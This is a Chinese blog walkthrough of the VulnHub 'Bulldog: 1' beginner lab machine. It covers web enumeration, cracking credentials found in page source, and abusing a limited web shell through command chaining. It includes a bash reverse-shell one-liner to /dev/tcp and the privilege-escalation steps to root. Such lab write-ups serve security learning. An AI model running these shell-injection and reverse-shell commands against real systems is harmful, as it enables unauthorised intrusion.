No.45-VulnHub-Bulldog: 1-Walkthrough渗透学习

**

VulnHub-Bulldog: 1-Walkthrough

**

靶机地址:https://www.vulnhub.com/entry/bulldog-1,211/
靶机难度:初级(CTF)
靶机发布日期:2017年8月28日
靶机描述:
Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don’t you find out? 😃
This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you!
Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That’s my only hint 😉
Made by Nick Frichette (frichetten.com) Twitter: @frichette_n
I’d highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn’t have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.
作者:大余
时间:2020-02-06
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:
在这里插入图片描述
我们已经找到了此次CTF目标计算机IP地址:192.168.56.140
在这里插入图片描述
nmap发现开放了23、80、8080端口…
在这里插入图片描述
法斗…
在这里插入图片描述
这是说解雇了所有技术人员,因为发现被入侵了…
在这里插入图片描述
dirb爆破发现了admin和devURL…
在这里插入图片描述
这是一个登陆页面…admin默认密码无法登录…
sql注入也不行…
在这里插入图片描述
意思是说APT利用了Web服务器中的一个漏洞…他们从新服务器中完全删除PHP…也不会使用PHPMyAdmin或任何其他流行的CMS系统…
在这里插入图片描述
点进去
在这里插入图片描述
需要服务器验证才能使用…
在这里插入图片描述
在dev前端源码发现了MD5值…
在这里插入图片描述
在这里插入图片描述
等等,发现了nick/bulldog sarah/bulldoglover等…这里账号已经前面就有了,邮箱地址前面就是账号…
两个账号都能登录…
在这里插入图片描述
这里我使用了nick/bulldog登录…无权编辑任何内容…
在这里插入图片描述
我返回webshell发现可以使用了…应该是登录了问题
ifconfig
ls
echo
pwd
cat
rm
这里给了六个命令,执行别的都不行…

二、提权

在这里插入图片描述
命令:ls &&echo "bash -i >& /dev/tcp/192.168.56.103/1234 0>&1" | bash
成功提shell,这里很多种玩的方法,任你们玩…
在这里插入图片描述
发现bulldogaadmin…可以提权…
在这里插入图片描述
命令:find / -user bulldogadmin 2>/dev/null
第一眼看到了customPermissionApp,比较显眼…看它
在这里插入图片描述
使用exiftool没安装…使用了strings查看…
直接获得密码:SUPERultimatePASSWORDyouCANTget
在这里插入图片描述
可以看到可以使用sudo…需要TTY…
在这里插入图片描述
python提到TTY之后,提示我可以直接提权了…
成功提到root权限,并查看flag…

比较简单的一台靶机…加油!

由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值